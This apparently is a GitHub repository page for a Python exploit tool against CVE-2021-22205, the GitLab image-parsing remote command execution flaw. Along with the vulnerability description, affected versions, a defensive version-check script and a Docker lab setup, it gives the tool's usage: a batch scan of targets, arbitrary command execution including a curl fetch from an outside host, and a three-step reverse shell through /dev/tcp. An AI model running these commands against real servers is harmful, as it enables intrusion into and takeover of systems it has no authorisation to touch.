  • Stars: 246
  • Rank 164,726 (Top 4 %)
  • Language: Python
  • Created about 3 years ago
  • Updated almost 2 years ago

Repository Details

CVE-2021-22205 & GitLab CE/EE RCE

Vuln Impact

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Vuln Product

  • GitLab CE/EE < 13.10.3
  • GitLab CE/EE < 13.9.6
  • GitLab CE/EE < 13.8.8
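
For triage, the ranges above can be turned into a version check that flags which instances in an inventory still need the upgrade. This is an added example, not code from this repository; it assumes the three listed versions are the fixed releases of the 13.10, 13.9 and 13.8 branches and that later branches already contain the fix. The host names are constructed.

```python
import re

# Fixed patch level per branch, taken from the "Vuln Product" list above.
FIXED = {(13, 10): 3, (13, 9): 6, (13, 8): 8}
FIRST_AFFECTED = (11, 9, 0)        # "all versions starting from 11.9"
OLDEST_FIXED_BRANCH = min(FIXED)   # (13, 8)


def parse_version(text):
    """Extract (major, minor, patch) from strings such as '13.9.1-ce.0'."""
    m = re.match(r"\s*v?(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised GitLab version: {text!r}")
    return tuple(int(g) if g else 0 for g in m.groups())


def is_affected(text):
    """True if the version falls inside the ranges listed for CVE-2021-22205."""
    major, minor, patch = parse_version(text)
    if (major, minor, patch) < FIRST_AFFECTED:
        return False
    branch = (major, minor)
    if branch in FIXED:
        return patch < FIXED[branch]
    # Branches below 13.8 fall under "< 13.8.8"; branches above 13.10 are
    # assumed to ship with the fix (assumption, see lead-in).
    return branch < OLDEST_FIXED_BRANCH


def audit(inventory):
    """Return the hosts in {host: version} that still need the upgrade."""
    return sorted(h for h, v in inventory.items() if is_affected(v))


if __name__ == "__main__":
    # Constructed inventory; the first entry is the image tag used in the
    # Environment section of this page.
    sample = {
        "gitlab.example.com": "13.9.1-ce.0",
        "git-a.example.com": "13.10.3-ee.0",
        "git-b.example.com": "12.5.3",
        "git-c.example.com": "11.8.9",
    }
    for host in audit(sample):
        print(f"{host}: {sample[host]} is in the affected range, upgrade")
```
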

Environment

export GITLAB_HOME=/srv/gitlab

sudo docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 \
  --name gitlab \
  --restart always \
  --volume $GITLAB_HOME/config:/etc/gitlab \
  --volume $GITLAB_HOME/logs:/var/log/gitlab \
  --volume $GITLAB_HOME/data:/var/opt/gitlab \
  gitlab/gitlab-ce:13.9.1-ce.0

Vuln Check

Basic usage
python3 CVE-2021-2205.py

Vuln check
python3 CVE-2021-2205.py -v true -t http://gitlab.example.com

command execute
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"

batch scan
python3 CVE-2021-2205.py -s true -f target.txt

Reverse Shell
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bash /tmp/1.sh"

Reference

https://github.com/mr-r3bot/Gitlab-CVE-2021-22205

https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
